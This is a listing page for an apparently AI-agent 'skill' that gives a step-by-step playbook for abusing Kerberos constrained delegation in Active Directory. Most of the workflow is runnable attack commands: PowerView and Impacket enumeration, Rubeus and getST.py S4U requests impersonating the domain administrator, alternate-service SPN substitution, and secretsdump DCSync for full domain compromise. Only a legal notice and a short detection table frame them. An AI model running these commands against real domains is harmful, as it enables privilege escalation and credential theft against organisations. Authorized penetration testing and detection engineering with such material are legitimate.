Skill

exploiting-constrained-delegation-abuse

Exploits Kerberos Constrained Delegation misconfigurations in Active Directory via S4U2self/S4U2proxy to impersonate privileged users for lateral movement and privilege escalation in authorized pentests.

Python

Powershell

security

npx claudepluginhub mukul975/anthropic-cybersecurity-skills --plugin cybersecurity-skills

Tool Access

This skill uses the workspace's default tool permissions.

Preview

> **Legal Notice:** This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.

Supporting Assets

LICENSEreferences/api-reference.mdreferences/standards.mdreferences/workflows.mdscripts/agent.py

SKILL.md

Similar Skills

applying-brand-guidelines

41.6k

Applies Acme Corporation brand guidelines including colors, fonts, layouts, and messaging to generated PowerPoint, Excel, and PDF documents.

3 files

anthropics-claude-cookbooks

creating-financial-models

41.6k

Builds DCF models with sensitivity analysis, Monte Carlo simulations, and scenario planning for investment valuation and risk assessment.

2 files

anthropics-claude-cookbooks

analyzing-financial-statements

41.6k

Calculates profitability (ROE, margins), liquidity (current ratio), leverage, efficiency, and valuation (P/E, EV/EBITDA) ratios from financial statements in CSV, JSON, text, or Excel for investment analysis.

2 files

anthropics-claude-cookbooks

Stats

Stars5748

Forks783

Last CommitApr 6, 2026

Actions

View Source View Plugin View on GitHub View README

Exploiting Constrained Delegation Abuse

Legal Notice: This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.

Overview

Kerberos Constrained Delegation (KCD) is a Windows Active Directory feature that allows a service to impersonate a user and access specific services on their behalf. The delegation targets are defined in the msDS-AllowedToDelegateTo attribute. When an attacker compromises an account configured with Constrained Delegation (particularly with the TRUSTED_TO_AUTH_FOR_DELEGATION flag), they can use the S4U2self and S4U2proxy Kerberos protocol extensions to request service tickets as any user (including Domain Admins) to the delegated services. If the delegation target includes services like CIFS, HTTP, or LDAP on a Domain Controller, this results in full domain compromise. The S4U2self extension requests a forwardable ticket on behalf of any user to the compromised service, and S4U2proxy forwards that ticket to the allowed delegation target.

When to Use

When performing authorized security testing that involves exploiting constrained delegation abuse
When analyzing malware samples or attack artifacts in a controlled environment
When conducting red team exercises or penetration testing engagements
When building detection capabilities based on offensive technique understanding

Prerequisites

Familiarity with red teaming concepts and tools
Access to a test or lab environment for safe execution
Python 3.8+ with required dependencies installed
Appropriate authorization for any testing activities

Objectives

Enumerate accounts with Constrained Delegation configured in the domain
Identify delegation targets (msDS-AllowedToDelegateTo) for high-value services
Exploit S4U2self and S4U2proxy to impersonate Domain Admin
Obtain service tickets for delegated services as a privileged user
Access delegated services (CIFS, LDAP, HTTP) on target hosts
Escalate to Domain Admin through Constrained Delegation abuse

MITRE ATT&CK Mapping

T1558.003 - Steal or Forge Kerberos Tickets: Kerberoasting
T1550.003 - Use Alternate Authentication Material: Pass the Ticket
T1134.001 - Access Token Manipulation: Token Impersonation/Theft
T1078.002 - Valid Accounts: Domain Accounts
T1021 - Remote Services

Workflow

Phase 1: Enumerate Constrained Delegation

Find accounts with Constrained Delegation using PowerView:

# Find users with Constrained Delegation
Get-DomainUser -TrustedToAuth | Select-Object samaccountname, msds-allowedtodelegateto

# Find computers with Constrained Delegation
Get-DomainComputer -TrustedToAuth | Select-Object samaccountname, msds-allowedtodelegateto

# Using AD Module
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo, userAccountControl

Using Impacket findDelegation.py:

findDelegation.py domain.local/user:'Password123' -dc-ip 10.10.10.1

Using BloodHound CE:

MATCH (c) WHERE c.allowedtodelegate IS NOT NULL
RETURN c.name, c.allowedtodelegate

Check for the TRUSTED_TO_AUTH_FOR_DELEGATION flag (protocol transition):

# UserAccountControl flag 0x1000000 = TRUSTED_TO_AUTH_FOR_DELEGATION
Get-DomainUser -TrustedToAuth | Select-Object samaccountname, useraccountcontrol

Phase 2: Exploit with Rubeus (Windows)

If you have the password or hash of the constrained delegation account:

# Request TGT for the constrained delegation account
Rubeus.exe asktgt /user:svc_sql /domain:domain.local /rc4:<ntlm_hash>

# Perform S4U2self + S4U2proxy to impersonate administrator
Rubeus.exe s4u /ticket:<base64_tgt> /impersonateuser:administrator \
  /msdsspn:CIFS/DC01.domain.local /ptt

# Alternative: specify alternate service name
Rubeus.exe s4u /ticket:<base64_tgt> /impersonateuser:administrator \
  /msdsspn:CIFS/DC01.domain.local /altservice:LDAP /ptt

Combined TGT request and S4U in single command:

Rubeus.exe s4u /user:svc_sql /rc4:<ntlm_hash> /impersonateuser:administrator \
  /msdsspn:CIFS/DC01.domain.local /domain:domain.local /ptt

Phase 3: Exploit with Impacket (Linux)

Request service ticket via S4U protocol extensions:

# Using getST.py with S4U
getST.py -spn CIFS/DC01.domain.local -impersonate administrator \
  -dc-ip 10.10.10.1 domain.local/svc_sql:'ServicePass123'

# Using hash instead of password
getST.py -spn CIFS/DC01.domain.local -impersonate administrator \
  -hashes :a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4 \
  -dc-ip 10.10.10.1 domain.local/svc_sql

# Use the obtained ticket
export KRB5CCNAME=administrator.ccache
smbclient.py -k -no-pass domain.local/administrator@DC01.domain.local

Phase 4: Alternate Service Name Abuse

Kerberos service tickets are not validated against the SPN in the ticket, allowing SPN substitution:

# Request CIFS ticket, then use it for LDAP (DCSync)
getST.py -spn CIFS/DC01.domain.local -impersonate administrator \
  -altservice LDAP/DC01.domain.local \
  -dc-ip 10.10.10.1 domain.local/svc_sql:'ServicePass123'

export KRB5CCNAME=administrator.ccache
secretsdump.py -k -no-pass domain.local/administrator@DC01.domain.local

This technique works because the service name in the ticket is not cryptographically bound to the session key

Phase 5: Protocol Transition Attack

If the account has TRUSTED_TO_AUTH_FOR_DELEGATION:

# S4U2self obtains a forwardable ticket without requiring the user to authenticate
# This means we can impersonate ANY user without their password
getST.py -spn CIFS/DC01.domain.local -impersonate administrator \
  -dc-ip 10.10.10.1 domain.local/svc_sql:'ServicePass123'

Without TRUSTED_TO_AUTH_FOR_DELEGATION, S4U2self tickets are non-forwardable and S4U2proxy will fail (unless using Resource-Based Constrained Delegation)

Tools and Resources

Tool	Purpose	Platform
Rubeus	S4U Kerberos ticket manipulation	Windows (.NET)
getST.py	S4U service ticket requests (Impacket)	Linux (Python)
findDelegation.py	Delegation enumeration (Impacket)	Linux (Python)
PowerView	AD delegation enumeration	Windows (PowerShell)
BloodHound CE	Visual delegation path analysis	Docker
Kekeo	Advanced Kerberos toolkit	Windows

Delegation Types Comparison

Type	Attribute	Scope	Attack Complexity
Unconstrained	TRUSTED_FOR_DELEGATION	Any service	Low (capture TGTs)
Constrained	msDS-AllowedToDelegateTo	Specific SPNs	Medium (S4U abuse)
Constrained + Protocol Transition	+ TRUSTED_TO_AUTH_FOR_DELEGATION	Specific SPNs	Medium (no user auth needed)
Resource-Based (RBCD)	msDS-AllowedToActOnBehalfOfOtherIdentity	On target	Medium (writable attribute)

Detection Signatures

Indicator	Detection Method
S4U2self ticket requests	Event 4769 with unusual service and impersonation
S4U2proxy forwarded tickets	Event 4769 with delegation flags set
Alternate service name in ticket	Mismatch between requested SPN and actual service access
Rubeus.exe execution	EDR process detection, command-line logging
Delegation configuration changes	Event 5136 for msDS-AllowedToDelegateTo modifications

Validation Criteria

Accounts with Constrained Delegation enumerated
Delegation targets (msDS-AllowedToDelegateTo) identified
S4U2self ticket obtained for target user
S4U2proxy ticket forwarded to delegation target
Privileged access to delegated service validated
Alternate service name substitution tested
Protocol transition capability assessed
Evidence documented with ticket exports and access proof